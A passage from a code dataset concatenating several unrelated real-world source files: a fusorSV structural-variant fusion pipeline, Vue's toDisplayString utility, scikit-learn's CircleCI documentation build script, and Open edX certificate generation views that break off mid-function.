        R = ru.flatten_mask_regions(R,O,complement=False) #single IRanges
        stop = time.time()
        print('svmask regions merged in %s sec'%(round(stop-start,2)))
    #mask these regions------------------------------------------------------------------------------------
    k,flt,f_id,m_id = 0,0,-1,1 #k=true_id,flt=filter 0 is .,PASS,f_id=fusorSV_id,m_id=metaSV_id
    exclude_callers = stage_exclude_list #exclude caller options put any id here to exclude
    # hand-tuned size-bin boundaries per SV type (keys follow `types` below)
    B = {t:[1,100,250,500,1000,5000,10000,50000,100000,1000000] for t in range(0,8)}
    # B = fusor.distribute_bins(Q,k,n_b=beta,m_b=obs,lower=None,upper=None,event=False) #equal power distribution
    B[1] = [1,50,100,1000,1000000]
    B[2] = [1,50,100,400,600,950,1250,1550,1950,2250,2950,3650,4800,6150,9000,18500,100000,1000000]
    #B[2] = [1,50,100,400,600,950,1250,1550,1950,2250,2950,3650,4800,6150,9000,18500,100000,10000000]
    B[3] = [1,50,1000,10000,50000,100000,250000,500000,1000000]
    #B[3] = [1,50,500,1000,5000,10000,50000,250000,10000000]
    B[5] = [1,50,2500,3500,45000,80000,115000,180000,260000,300000,375000,500000]
    #B[5] = [1,50,100,250,500,1000,2500,3500,45000,80000,115000,180000,260000,300000,500000,1000000]
    types = {0:'SUB',1:'INS',2:'DEL',3:'DUP',4:'CNV',5:'INV',6:'TRA',7:'BND'}
    bins = {t:su.pretty_ranges(B[t],'') for t in B}
    partition_path = out_dir+'/svul/'
    total_partitions = len(glob.glob(partition_path+'*.pickle.gz'))
    #entry for testing-------------------------------------
    # c = fusor.check_sample_full(samples,-2,-3,O,R,chroms,types=[2,3,5],flt=0,r=0.9,self_merge=True)
    #entry for testing------------------------------------
    #||||||||||||||||||||||||||||||||||||||BY SAMPLE|||||||||||||||||||||||||||||||||||||||||||||
    #[1] read, parse, structure, select, partition and write out data for each sample if not done
    snames_svuls = {}
    written_svuls = glob.glob(partition_path+'*.pickle.gz')
    for svul in written_svuls:
        sname = svul.rsplit('/')[-1].rsplit('_')[0]
        # NOTE(review): has_key is Python-2-only (AttributeError on Python 3)
        if snames_svuls.has_key(sname): snames_svuls[sname] += 1
        else: snames_svuls[sname] = 1
    if total_partitions<1 or len(set(snames).difference(set(snames_svuls.keys())))>1:
        print('reading, parsing, partitioning and writing sample VCFs')
        start = time.time()
        p1 = mp.Pool(processes=cpus)
        for sample in samples:
            p1.apply_async(partition_call_sets,
                           args=(sample,k,O,R,B,chroms,flt,[],exclude_callers),
                           callback=collect_results)
            time.sleep(0.25)
        p1.close()
        p1.join()
        L = []
        for i in result_list:
            if i is not None: L+=[i]
        result_list = []
        gc.collect()
        snames = [i[0] for i in L] #passing list of sample names
        #only have to read in the samples once
        stop = time.time()
        total_partitions = len(glob.glob(partition_path+'*.pickle.gz'))
        print('finished reading %s out of %s samples generating %s partitions in %s sec'%\
              (len(snames),len(samples),total_partitions,round(stop-start,2)))
    #||||||||||||||||||||||||||||||||||||||BY SAMPLE|||||||||||||||||||||||||||||||||||||||||||||
    if n_cross>1 and cross_fold>1: #for each run will permute using the k_fold divisor to partition
        print('employing crossfold validation measures...runs=%s\tkfold=%s'%(n_cross,cross_fold))
    for n_k in range(n_cross): #default is 1 and cross_fold = 0
        n_start = time.time()
        tst_ids = []
        if cross_fold>1:
            # NOTE(review): len(samples)/cross_fold relies on Python 2
            # integer division; under Python 3 this would pass a float size
            tst_ids = sorted(list(np.random.choice(range(len(samples)),len(samples)/cross_fold,replace=False)))
        trn_ids = sorted(list(set(range(len(samples))).difference(set(tst_ids))))
        tst_str = ''.join([hex(i)[2:].upper() for i in tst_ids]) #get a id sorted hex string of the ids used
        trn_str = ''.join([hex(i)[2:].upper() for i in trn_ids]) #get a id sorted hex string of the ids used
        if len(tst_str)>10: tst_str = str(hash(tst_str))
        if len(trn_str)>10: trn_str = str(hash(trn_str))
        #||||||||||||||||||||||||||||||||||||||BY PARTITION||||||||||||||||||||||||||||||||||||||||||
        #[2]train or apply the model
        #load the data and build a model if one isn't already available in ||
        if apply_fusion_model_path is None: #train a new model assuming k_fold=0 here
            model_path = out_dir+'/models/'+'.'.join(ref_path.rsplit('/')[-1].rsplit('.')[0:-1])+\
                         '.'+in_dir[0:-1].rsplit('/')[-1]+trn_str+'.pickle.gz'
            if not os.path.exists(model_path): #write a model if it hasn't been done yet
                start = time.time() #now in || for faster performance and less RAM
                p1 = mp.Pool(processes=cpus)
                for t in types:
                    for b in range(len(B[t])-1):
                        p1.apply_async(prior_model_partition,
                                       args=([snames[i] for i in trn_ids],t,b,k,
                                             callers,exclude_callers,min_g,False),
                                       callback=collect_results)
                        time.sleep(0.5)
                p1.close()
                p1.join()
                L = []
                for i in result_list:
                    if i is not None: L+=[i]
                result_list = []
                gc.collect()
                stop = time.time()
                print('finished modeling in %s sec'%round(stop-start,2))
                J,D,E,alpha,n,K = fusor.assemble_model(L)
                fusor.export_fusion_model(B,J,D,E,alpha,len(snames),K,model_path)
                L = []
                gc.collect()
            else: #can clip this one the || sample application is completed
                B,J,D,E,alpha,n,K = fusor.import_fusion_model(model_path)
        else: #apply an existing model and then use additive smoothing with the all new input data
            B,J,D,E,alpha,n,K = fusor.import_fusion_model(apply_fusion_model_path)
            model_path = out_dir+'/models/'+'.'.join(ref_path.rsplit('/')[-1].rsplit('.')[0:-1])+\
                         '.'+in_dir[0:-1].rsplit('/')[-1]+trn_str+'.post.pickle.gz'
            #now look at the new data and make a model for it, minus the true (estimate it)
            if not os.path.exists(model_path) and args.smoothing: #write a model if it hasn't been done yet
                start = time.time() #now in || for faster performance and less RAM
                p1 = mp.Pool(processes=cpus)
                for t in types:
                    for b in range(len(B[t])-1):
                        p1.apply_async(post_model_partition,
                                       args=(apply_fusion_model_path,snames,t,b,k,
                                             callers,exclude_callers,min_g,
                                             args.smoothing),
                                       callback=collect_results)
                        time.sleep(0.5)
                p1.close()
                p1.join()
                L = []
                for i in result_list:
                    if i is not None: L+=[i]
                result_list = []
                gc.collect()
                stop = time.time()
                print('finished estimation in %s sec'%round(stop-start,2))
                J_post,D_post,E_post,alpha_post,n_post,K = fusor.assemble_model(L,args.smoothing)
                fusor.export_fusion_model(B,J_post,D_post,E_post,alpha_post,len(snames),K,model_path)
                L = []
                gc.collect()
            else: #can clip this one the || sample application is completed
                B,J_post,D_post,E_post,alpha_post,n_post,K = fusor.import_fusion_model(apply_fusion_model_path)
        #||||||||||||||||||||||||||||||||||||||BY PARTITION||||||||||||||||||||||||||||||||||||||||||
        #||||||||||||||||||||||||||||||||||||||BY SAMPLE|||||||||||||||||||||||||||||||||||||||||||||
        print('apply fusion model to sample inputs and generating fusorSV ouput')
        if n_cross>1 and cross_fold>1:
            print('scoring the crossfold run %s out of...runs=%s\tkfold=%s'%(n_k,n_cross,cross_fold))
        else:
            tst_ids,tst_str = trn_ids,trn_str
        start = time.time()
        # NOTE(review): cpus/2 is Python 2 integer division (see note above)
        p1 = mp.Pool(processes=max(1,cpus/2))
        for sample in [samples[i] for i in tst_ids]:
            p1.apply_async(apply_model_to_samples,
                           args=(sample,ref_path,chroms,types,bins,callers,O,
                                 model_path,apply_fusion_model_path,k,f_id,
                                 over_m,0.5,args.smoothing,args.detail,args.detail,6),
                           callback=collect_results)
            time.sleep(0.5)
        p1.close()
        p1.join()
        L = []
        for i in result_list:
            if i is not None: L+=[i]
        result_list = []
        gc.collect()
        #only have to read in the samples once
        stop = time.time()
        print('finished reading samples in %s sec'%round(stop-start,2))
        #||||||||||||||||||||||||||||||||||||||BY SAMPLE|||||||||||||||||||||||||||||||||||||||||||||
        cross_fold_stats,hist,detailed_stats = fusor.assemble_stats(L)
        ref_seq = {'.'.join(ref_path.rsplit('/')[-1].rsplit('.')[0:-1]):ru.read_fasta(ref_path)}
        #compute cross_fold averages
        if apply_fusion_model_path is None:
            for c in cross_fold_stats:
                print('%s--------------------------------------------------------------'%callers[c])
                for t in cross_fold_stats[c]:
                    if len(cross_fold_stats[c][t])>0:#have all samples here to plot/look at!
                        #idea[1] look at scatterplot with a line
                        prec = round(np.mean([i[2] for i in cross_fold_stats[c][t]]),2)
                        rec  = round(np.mean([i[3] for i in cross_fold_stats[c][t]]),2)
                        f1   = round(np.mean([i[4] for i in cross_fold_stats[c][t]]),2)
                        j    = round(np.mean([i[5] for i in cross_fold_stats[c][t]]),2)
                        n    = round(np.mean([i[7] for i in cross_fold_stats[c][t]]),2)
                        m    = round(np.mean([i[8] for i in cross_fold_stats[c][t]]),2)
                        l_mu = round(np.mean([i[9] for i in cross_fold_stats[c][t]]),2)
                        r_mu = round(np.mean([i[10] for i in cross_fold_stats[c][t]]),2)
                        print('average for t=%s\tprec=%s\trec=%s\tf1=%s\tj=%s\tn=%s\tm=%s\tl_mu=%s\tr_mu=%s'%\
                              (types[t],prec,rec,f1,j,n,m,l_mu,r_mu))
        #CHECK-SCORES-----------------------------------------------------------------------------------------------
        fusor.export_caller_performance(cross_fold_stats,callers,
                                        out_dir+'/visual/cross_fold_stats.'+tst_str+'.tsv')
        fusor.export_detailed_performance(detailed_stats,callers,
                                          out_dir+'/visual/detailed_stats.'+tst_str+'.tsv')
        fusor.export_caller_by_type_and_bin(E,alpha,callers,types,bins,
                                            out_dir+'/visual/callers_tbj.'+tst_str+'.tsv')
        fusor.export_distance_matrix(D,callers,types,bins,
                                     out_dir+'/visual/sim_matrix.'+tst_str+'.tsv',sim=True)
        #(a) check for an Rscript engine
        #(b) use the command parser to fire up the Rscript and check
        #(c) for the drawing libraries to ggplot, ect to use
        #-------------------------------------------------------------------
        vcf_glob = out_dir+'/vcf/*_S-1.vcf' #fusorSV VCFS only
        if not args.no_merge:
            if cluster_overlap > 0.0:
                print('cluster merging tool processing samples')
                out_vcf = out_dir+'/vcf/all_samples_genotypes.'+tst_str+'.vcf'
                # NOTE(review): ref_seq.keys()[0] is Python-2-only (see note
                # in the --merge fast path above)
                print('completed = %s'%su.fusorSV_vcf_multi_sample_merge(vcf_glob,out_vcf,
                                                                         ref_seq[ref_seq.keys()[0]],
                                                                         overlap=cluster_overlap))
            if lift_over is not None:
                #now do a liftover to partition the calls with a possible new reference space
                su.fusorSV_vcf_liftover_samples(out_dir+'/vcf/all_samples_genotypes*.vcf*',ref_path,lift_over) #default is on
        # NOTE(review): despite its name, passing --clean SKIPS this cleanup
        # (matches the help text "keep all kfold run data") — confirm intent
        if n_cross>1 and cross_fold>1 and not args.clean: #can clean up the VCF and model files...
            print('cleaning interim data for run %s out of...runs=%s\tkfold=%s'%(n_k, n_cross,cross_fold))
            os.remove(model_path)
            for vcf in glob.glob(vcf_glob): os.remove(vcf)
        n_stop = time.time()
        print('run %s in %s sec'%(n_k,round(n_stop-n_start,2)))
        print(''.join([':::' for i in range(40)]))
|
unknown
|
codeparrot/codeparrot-clean
| ||
// enums are compiled away via custom transform so no real dependency here
import { ReactiveFlags } from '@vue/reactivity'
import {
isArray,
isFunction,
isMap,
isObject,
isPlainObject,
isSet,
isString,
isSymbol,
objectToString,
} from './general'
// can't use isRef here since @vue/shared has no deps
const isRef = (val: any): val is { value: unknown } => {
  // a ref is any truthy value carrying the IS_REF reactivity flag
  if (!val) return false
  return val[ReactiveFlags.IS_REF] === true
}
/**
* For converting {{ interpolation }} values to displayed strings.
* @private
*/
export const toDisplayString = (val: unknown): string => {
  // strings pass through untouched
  if (isString(val)) {
    return val
  }
  // null/undefined render as the empty string
  if (val == null) {
    return ''
  }
  // arrays, and plain-ish objects without a custom toString, are shown as
  // pretty-printed JSON (unwrapping refs first so the inner value is shown)
  const shouldStringify =
    isArray(val) ||
    (isObject(val) &&
      (val.toString === objectToString || !isFunction(val.toString)))
  if (shouldStringify) {
    return isRef(val)
      ? toDisplayString(val.value)
      : JSON.stringify(val, replacer, 2)
  }
  // everything else (numbers, symbols, objects with custom toString, ...)
  return String(val)
}
const replacer = (_key: string, val: unknown): any => {
  // unwrap refs recursively before deciding how to render
  if (isRef(val)) {
    return replacer(_key, val.value)
  }
  // Maps become a single-key object whose key shows the size and whose
  // value maps "key =>" strings to entry values
  if (isMap(val)) {
    const rendered: Record<string, any> = {}
    let index = 0
    for (const [entryKey, entryVal] of val.entries()) {
      rendered[stringifySymbol(entryKey, index) + ' =>'] = entryVal
      index++
    }
    return { [`Map(${val.size})`]: rendered }
  }
  // Sets become a single-key object listing their values
  if (isSet(val)) {
    const members: unknown[] = []
    for (const member of val.values()) {
      members.push(stringifySymbol(member))
    }
    return { [`Set(${val.size})`]: members }
  }
  if (isSymbol(val)) {
    return stringifySymbol(val)
  }
  // non-plain, non-array objects (e.g. native/host objects) fall back to
  // their own string conversion
  if (isObject(val) && !isArray(val) && !isPlainObject(val)) {
    return String(val)
  }
  return val
}
const stringifySymbol = (v: unknown, i: number | string = ''): any => {
  // non-symbols pass through unchanged
  if (!isSymbol(v)) {
    return v
  }
  // Symbol.description is es2019+, so cast to satisfy the es2016 lib check;
  // fall back to the provided index when the symbol has no description
  return `Symbol(${(v as any).description ?? i})`
}
|
typescript
|
github
|
https://github.com/vuejs/core
|
packages/shared/src/toDisplayString.ts
|
#!/usr/bin/env bash
set -e
set -x

# Decide what kind of documentation build to run, and run it.
#
# If the last commit message has a "[doc skip]" marker, do not build
# the doc. On the contrary if a "[doc build]" marker is found, build the doc
# instead of relying on the subsequent rules.
#
# We always build the documentation for jobs that are not related to a specific
# PR (e.g. a merge to main or a maintenance branch).
#
# If this is a PR, do a full build if there are some files in this PR that are
# under the "doc/" or "examples/" folders, otherwise perform a quick build.
#
# If the inspection of the current commit fails for any reason, the default
# behavior is to quick build the documentation.

# defines the get_dep and show_installed_libraries functions
source build_tools/shared.sh

if [ -n "$GITHUB_ACTION" ]
then
    # Map the variables from Github Action to CircleCI so the rest of the
    # script can use the CIRCLE_* names regardless of which CI runs it.
    CIRCLE_SHA1=$(git log -1 --pretty=format:%H)
    CIRCLE_JOB=$GITHUB_JOB
    if [ "$GITHUB_EVENT_NAME" == "pull_request" ]
    then
        CIRCLE_BRANCH=$GITHUB_HEAD_REF
        CI_PULL_REQUEST=true
        CI_TARGET_BRANCH=$GITHUB_BASE_REF
    else
        CIRCLE_BRANCH=$GITHUB_REF_NAME
    fi
fi

if [[ -n "$CI_PULL_REQUEST" && -z "$CI_TARGET_BRANCH" ]]
then
    # Get the target branch name when using CircleCI (queried from the
    # GitHub API since CircleCI does not expose it directly)
    CI_TARGET_BRANCH=$(curl -s "https://api.github.com/repos/scikit-learn/scikit-learn/pulls/$CIRCLE_PR_NUMBER" | jq -r .base.ref)
fi
# Decide which kind of documentation build to run for the current commit.
# Echoes one of "SKIP: ...", "QUICK: ...", "QUICK BUILD: ..." or "BUILD: ...";
# callers pattern-match on the leading word(s). When modified examples are
# detected, the grep pattern of examples to run is echoed as the LAST line.
get_build_type() {
    if [ -z "$CIRCLE_SHA1" ]
    then
        echo SKIP: undefined CIRCLE_SHA1
        return
    fi
    commit_msg=$(git log --format=%B -n 1 $CIRCLE_SHA1)
    if [ -z "$commit_msg" ]
    then
        echo QUICK BUILD: failed to inspect commit $CIRCLE_SHA1
        return
    fi
    if [[ "$commit_msg" =~ \[doc\ skip\] ]]
    then
        echo SKIP: [doc skip] marker found
        return
    fi
    if [[ "$commit_msg" =~ \[doc\ quick\] ]]
    then
        echo QUICK: [doc quick] marker found
        return
    fi
    if [[ "$commit_msg" =~ \[doc\ build\] ]]
    then
        echo BUILD: [doc build] marker found
        return
    fi
    if [ -z "$CI_PULL_REQUEST" ]
    then
        echo BUILD: not a pull request
        return
    fi
    git_range="origin/main...$CIRCLE_SHA1"
    # BUGFIX: use a brace group, not a subshell. A `return` inside `( ... )`
    # only exits the subshell, so the function previously kept running after
    # a failed fetch instead of falling back to a quick build.
    git fetch origin main >&2 || { echo QUICK BUILD: failed to get changed filenames for $git_range; return; }
    filenames=$(git diff --name-only $git_range)
    if [ -z "$filenames" ]
    then
        echo QUICK BUILD: no changed filenames for $git_range
        return
    fi
    changed_examples=$(echo "$filenames" | grep -E "^examples/(.*/)*plot_")

    # The following is used to extract the list of filenames of example python
    # files that sphinx-gallery needs to run to generate png files used as
    # figures or images in the .rst files from the documentation.
    # If the contributor changes a .rst file in a PR we need to run all
    # the examples mentioned in that file to get sphinx build the
    # documentation without generating spurious warnings related to missing
    # png files.
    if [[ -n "$filenames" ]]
    then
        # get rst files
        rst_files="$(echo "$filenames" | grep -E "rst$")"
        # get lines with figure or images
        img_fig_lines="$(echo "$rst_files" | xargs grep -shE "(figure|image)::")"
        # get only auto_examples
        auto_example_files="$(echo "$img_fig_lines" | grep auto_examples | awk -F "/" '{print $NF}')"
        # remove "sphx_glr_" from path and accept replace _(\d\d\d|thumb).png with .py
        scripts_names="$(echo "$auto_example_files" | sed 's/sphx_glr_//' | sed -E 's/_([[:digit:]][[:digit:]][[:digit:]]|thumb).png/.py/')"
        # get unique values
        examples_in_rst="$(echo "$scripts_names" | uniq )"
    fi

    # executed only if there are examples in the modified rst files
    if [[ -n "$examples_in_rst" ]]
    then
        if [[ -n "$changed_examples" ]]
        then
            changed_examples="$changed_examples|$examples_in_rst"
        else
            changed_examples="$examples_in_rst"
        fi
    fi

    if [[ -n "$changed_examples" ]]
    then
        echo BUILD: detected examples/ filename modified in $git_range: $changed_examples
        pattern=$(echo "$changed_examples" | paste -sd '|')
        # pattern for examples to run is the last line of output
        echo "$pattern"
        return
    fi
    echo QUICK BUILD: no examples/ filename modified in $git_range:
    echo "$filenames"
}
# Pick the make target from the build type decided above, then set up the
# build environment (apt packages, conda env, ccache) and run the build.
build_type=$(get_build_type)
if [[ "$build_type" =~ ^SKIP ]]
then
    exit 0
fi

if [[ "$CIRCLE_BRANCH" =~ ^main$|^[0-9]+\.[0-9]+\.X$ && -z "$CI_PULL_REQUEST" ]]
then
    # ZIP linked into HTML
    make_args=dist
elif [[ "$build_type" =~ ^QUICK ]]
then
    make_args=html-noplot
elif [[ "$build_type" =~ ^'BUILD: detected examples' ]]
then
    # pattern for examples to run is the last line of output
    pattern=$(echo "$build_type" | tail -n 1)
    make_args="html EXAMPLES_PATTERN=$pattern"
else
    make_args=html
fi

# Installing required system packages to support the rendering of math
# notation in the HTML documentation and to optimize the image files
sudo -E apt-get -yq update --allow-releaseinfo-change
sudo -E apt-get -yq --no-install-suggests --no-install-recommends \
    install dvipng gsfonts ccache zip optipng

# deactivate circleci virtualenv and setup a conda env instead
if [[ `type -t deactivate` ]]; then
    deactivate
fi

# Install Miniforge
MINIFORGE_URL="https://github.com/conda-forge/miniforge/releases/latest/download/Miniforge3-Linux-x86_64.sh"
curl -L --retry 10 $MINIFORGE_URL -o miniconda.sh
MINIFORGE_PATH=$HOME/miniforge3
bash ./miniconda.sh -b -p $MINIFORGE_PATH
source $MINIFORGE_PATH/etc/profile.d/conda.sh
conda activate

# create_conda_environment_from_lock_file comes from build_tools/shared.sh
create_conda_environment_from_lock_file $CONDA_ENV_NAME $LOCK_FILE
conda activate $CONDA_ENV_NAME

# Sets up ccache when using system compiler
export PATH="/usr/lib/ccache:$PATH"
# Sets up ccache when using conda-forge compilers (needs to be after conda
# activate which sets CC and CXX)
export CC="ccache $CC"
export CXX="ccache $CXX"
ccache -M 512M
export CCACHE_COMPRESS=1
# Zeroing statistics so that ccache statistics are shown only for this build
ccache -z

show_installed_libraries

# Specify explicitly ninja -j argument because ninja does not handle cgroups v2 and
# use the same default rule as ninja (-j3 since we have 2 cores on CircleCI), see
# https://github.com/scikit-learn/scikit-learn/pull/30333
pip install -e . --no-build-isolation --config-settings=compile-args="-j 3"

echo "ccache build summary:"
ccache -s
export OMP_NUM_THREADS=1

if [[ "$CIRCLE_BRANCH" == "main" || "$CI_TARGET_BRANCH" == "main" ]]
then
    towncrier build --yes
fi

if [[ "$CIRCLE_BRANCH" =~ ^main$ && -z "$CI_PULL_REQUEST" ]]
then
    # List available documentation versions if on main
    python build_tools/circle/list_versions.py --json doc/js/versions.json --rst doc/versions.rst
fi

# The pipefail is requested to propagate exit code
set -o pipefail && cd doc && make $make_args 2>&1 | tee ~/log.txt
cd -
set +o pipefail
# Print the doc-root-relative HTML paths affected by this PR's changed files:
# doc/*.rst(.template) -> *.html, towncrier fragments -> the release
# changelog page, examples/*.py -> auto_examples pages, and generated API
# pages whose source links reference modified sklearn/ files.
affected_doc_paths() {
    scikit_learn_version=$(python -c 'import re; import sklearn; print(re.sub(r"(\d+\.\d+).+", r"\1", sklearn.__version__))')
    files=$(git diff --name-only origin/main...$CIRCLE_SHA1)
    # use sed to replace files ending by .rst or .rst.template by .html
    echo "$files" | grep -vP 'upcoming_changes/.*/\d+.*\.rst' | grep ^doc/.*\.rst | \
        sed 's/^doc\/\(.*\)\.rst$/\1.html/; s/^doc\/\(.*\)\.rst\.template$/\1.html/'
    # replace towncrier fragment files by link to changelog. uniq is used
    # because in some edge cases multiple fragments can be added and we want a
    # single link to the changelog.
    echo "$files" | grep -P 'upcoming_changes/.*/\d+.*\.rst' | sed "s@.*@whats_new/v${scikit_learn_version}.html@" | uniq
    echo "$files" | grep ^examples/.*.py | sed 's/^\(.*\)\.py$/auto_\1.html/'
    sklearn_files=$(echo "$files" | grep '^sklearn/')
    if [ -n "$sklearn_files" ]
    then
        # find generated API pages that link to any of the modified sources
        grep -hlR -f<(echo "$sklearn_files" | sed 's/^/scikit-learn\/blob\/[a-z0-9]*\//') doc/_build/html/stable/modules/generated | cut -d/ -f5-
    fi
}
# Print the sphinx WARNING lines from ~/log.txt that mention a file modified
# by this PR; prints nothing when there are no matching warnings.
affected_doc_warnings() {
    files=$(git diff --name-only origin/main...$CIRCLE_SHA1)
    # Look for sphinx warnings only in files affected by the PR
    if [ -n "$files" ]
    then
        # NOTE(review): $files is a newline-separated string, not an array;
        # ${files[@]} relies on word splitting here — works, but fragile.
        for af in ${files[@]}
        do
            warn+=`grep WARNING ~/log.txt | grep $af`
        done
    fi
    echo "$warn"
}
# For PR builds: report affected pages and sphinx warnings, write an HTML
# summary into the built docs, and fail the job if warnings were produced.
if [ -n "$CI_PULL_REQUEST" ]
then
    echo "The following documentation warnings may have been generated by PR #$CI_PULL_REQUEST:"
    warnings=$(affected_doc_warnings)
    if [ -z "$warnings" ]
    then
        # sentinel value; the path prefix is stripped by the sed below
        warnings="/home/circleci/project/ no warnings"
    fi
    echo "$warnings"

    echo "The following documentation files may have been changed by PR #$CI_PULL_REQUEST:"
    affected=$(affected_doc_paths)
    echo "$affected"
    (
    echo '<html><body><ul>'
    echo "$affected" | sed 's|.*|<li><a href="&">&</a> [<a href="https://scikit-learn.org/dev/&">dev</a>, <a href="https://scikit-learn.org/stable/&">stable</a>]</li>|'
    echo '</ul><p>General: <a href="index.html">Home</a> | <a href="api/index.html">API Reference</a> | <a href="auto_examples/index.html">Examples</a></p>'
    echo '<strong>Sphinx Warnings in affected files</strong><ul>'
    echo "$warnings" | sed 's/\/home\/circleci\/project\//<li>/g'
    echo '</ul></body></html>'
    ) > 'doc/_build/html/stable/_changed.html'

    if [ "$warnings" != "/home/circleci/project/ no warnings" ]
    then
        echo "Sphinx generated warnings when building the documentation related to files modified in this PR."
        echo "Please check doc/_build/html/stable/_changed.html"
        exit 1
    fi
fi
|
unknown
|
github
|
https://github.com/scikit-learn/scikit-learn
|
build_tools/circle/build_doc.sh
|
"""
Views used by XQueue certificate generation.
"""
import json
import logging
from django.contrib.auth.models import User
from django.db import transaction
from django.http import Http404, HttpResponse, HttpResponseForbidden
from django.views.decorators.csrf import csrf_exempt
from django.views.decorators.http import require_POST
from opaque_keys.edx.keys import CourseKey
from capa.xqueue_interface import XQUEUE_METRIC_NAME
from lms.djangoapps.certificates.api import generate_user_certificates
from lms.djangoapps.certificates.models import (
CertificateStatuses,
ExampleCertificate,
GeneratedCertificate,
certificate_status_for_student
)
from util.bad_request_rate_limiter import BadRequestRateLimiter
from util.json_request import JsonResponse, JsonResponseBadRequest
from xmodule.modulestore.django import modulestore
log = logging.getLogger(__name__)
# Grades can potentially be written - if so, let grading manage the transaction.
@transaction.non_atomic_requests
@csrf_exempt
def request_certificate(request):
    """Request the on-demand creation of a certificate for some user, course.

    A request doesn't imply a guarantee that such a creation will take place.
    We intentionally use the same machinery as is used for doing certification
    at the end of a course run, so that we can be sure users get graded and
    then if and only if they pass, do they get a certificate issued.
    """
    # Non-POST requests fall through and return None, as before.
    if request.method != "POST":
        return None

    if not request.user.is_authenticated:
        return HttpResponse(
            json.dumps({'add_status': 'ERRORANONYMOUSUSER'}),
            content_type='application/json')

    username = request.user.username
    student = User.objects.get(username=username)
    course_key = CourseKey.from_string(request.POST.get('course_id'))
    course = modulestore().get_course(course_key, depth=2)

    status = certificate_status_for_student(student, course_key)['status']
    # Only (re)generate when there is no usable certificate yet.
    regenerable_statuses = (
        CertificateStatuses.unavailable,
        CertificateStatuses.notpassing,
        CertificateStatuses.error,
    )
    if status in regenerable_statuses:
        log.info(
            u'Grading and certification requested for user %s in course %s via /request_certificate call',
            username, course_key)
        status = generate_user_certificates(student, course_key, course=course)
    return HttpResponse(json.dumps({'add_status': status}),
                        content_type='application/json')
@csrf_exempt
def update_certificate(request):
    """
    Will update GeneratedCertificate for a new certificate or
    modify an existing certificate entry.

    See models.py for a state diagram of certificate states

    This view should only ever be accessed by the xqueue server

    Expects a POST whose 'xqueue_body' and 'xqueue_header' fields are
    JSON-encoded; the certificate is looked up by username, course_id and
    the 'lms_key' from the header.  Returns a JSON body with
    'return_code' 0 on success and 1 on lookup failure or an invalid
    status transition.  Non-POST requests return None.
    """
    status = CertificateStatuses
    if request.method == "POST":
        xqueue_body = json.loads(request.POST.get('xqueue_body'))
        xqueue_header = json.loads(request.POST.get('xqueue_header'))

        try:
            course_key = CourseKey.from_string(xqueue_body['course_id'])

            cert = GeneratedCertificate.eligible_certificates.get(
                user__username=xqueue_body['username'],
                course_id=course_key,
                key=xqueue_header['lms_key'])

        except GeneratedCertificate.DoesNotExist:
            log.critical(
                'Unable to lookup certificate\n'
                'xqueue_body: %s\n'
                'xqueue_header: %s',
                xqueue_body,
                xqueue_header
            )

            return HttpResponse(json.dumps({
                'return_code': 1,
                'content': 'unable to lookup key'
            }), content_type='application/json')

        if 'error' in xqueue_body:
            # The XQueue reported a generation failure: record it.
            cert.status = status.error
            if 'error_reason' in xqueue_body:

                # Hopefully we will record a meaningful error
                # here if something bad happened during the
                # certificate generation process
                #
                # example:
                #  (aamorm BerkeleyX/CS169.1x/2012_Fall)
                #  <class 'simples3.bucket.S3Error'>:
                #  HTTP error (reason=error(32, 'Broken pipe'), filename=None) :
                #  certificate_agent.py:175
                cert.error_reason = xqueue_body['error_reason']
        else:
            # Success path: only two transitions are valid —
            # generating -> downloadable and deleting -> deleted.
            if cert.status == status.generating:
                cert.download_uuid = xqueue_body['download_uuid']
                cert.verify_uuid = xqueue_body['verify_uuid']
                cert.download_url = xqueue_body['url']
                cert.status = status.downloadable
            elif cert.status in [status.deleting]:
                cert.status = status.deleted
            else:
                log.critical(
                    'Invalid state for cert update: %s', cert.status
                )
                return HttpResponse(
                    json.dumps({
                        'return_code': 1,
                        'content': 'invalid cert status'
                    }),
                    content_type='application/json'
                )

        cert.save()
        return HttpResponse(json.dumps({'return_code': 0}),
                            content_type='application/json')
@csrf_exempt
@require_POST
def update_example_certificate(request):
    """Callback from the XQueue that updates example certificates.

    Example certificates are used to verify that certificate
    generation is configured correctly for a course.

    Unlike other certificates, example certificates
    are not associated with a particular user or displayed
    to students.

    For this reason, we need a different end-point to update
    the status of generated example certificates.

    Arguments:
        request (HttpRequest)

    Returns:
        HttpResponse (200): Status was updated successfully.
        HttpResponse (400): Invalid parameters.
        HttpResponse (403): Rate limit exceeded for bad requests.
        HttpResponse (404): Invalid certificate identifier or access key.

    """
    log.info(u"Received response for example certificate from XQueue.")

    rate_limiter = BadRequestRateLimiter()

    # Check the parameters and rate limits
    # If these are invalid, return an error response.
    if rate_limiter.is_rate_limit_exceeded(request):
        log.info(u"Bad request rate limit exceeded for update example certificate end-point.")
        return HttpResponseForbidden("Rate limit exceeded")

    if 'xqueue_body' not in request.POST:
        log.info(u"Missing parameter 'xqueue_body' for update example certificate end-point")
        rate_limiter.tick_bad_request_counter(request)
        return JsonResponseBadRequest("Parameter 'xqueue_body' is required.")

    if 'xqueue_header' not in request.POST:
        log.info(u"Missing parameter 'xqueue_header' for update example certificate end-point")
        rate_limiter.tick_bad_request_counter(request)
        return JsonResponseBadRequest("Parameter 'xqueue_header' is required.")

    try:
        xqueue_body = json.loads(request.POST['xqueue_body'])
        xqueue_header = json.loads(request.POST['xqueue_header'])
    except (ValueError, TypeError):
        log.info(u"Could not decode params to example certificate end-point as JSON.")
        rate_limiter.tick_bad_request_counter(request)
        return JsonResponseBadRequest("Parameters must be JSON-serialized.")

    # Attempt to retrieve the example certificate record
    # so we can update the status.
    try:
        # NOTE: the XQueue protocol reuses the 'username' field to carry the
        # example certificate's uuid here (no real user is involved).
        uuid = xqueue_body.get('username')
        access_key = xqueue_header.get('lms_key')
        cert = ExampleCertificate.objects.get(uuid=uuid, access_key=access_key)
    except ExampleCertificate.DoesNotExist:
        # If we are unable to retrieve the record, it means the uuid or access key
        # were not valid.  This most likely means that the request is NOT coming
        # from the XQueue.  Return a 404 and increase the bad request counter
        # to protect against a DDOS attack.
        log.info(u"Could not find example certificate with uuid '%s' and access key '%s'", uuid, access_key)
        rate_limiter.tick_bad_request_counter(request)
        raise Http404

    if 'error' in xqueue_body:
        # If an error occurs, save the error message so we can fix the issue.
        error_reason = xqueue_body.get('error_reason')
        cert.update_status(ExampleCertificate.STATUS_ERROR, error_reason=error_reason)
        log.warning(
            (
                u"Error occurred during example certificate generation for uuid '%s'.  "
                u"The error response was '%s'."
            ), uuid, error_reason
        )
    else:
        # If the certificate generated successfully, save the download URL
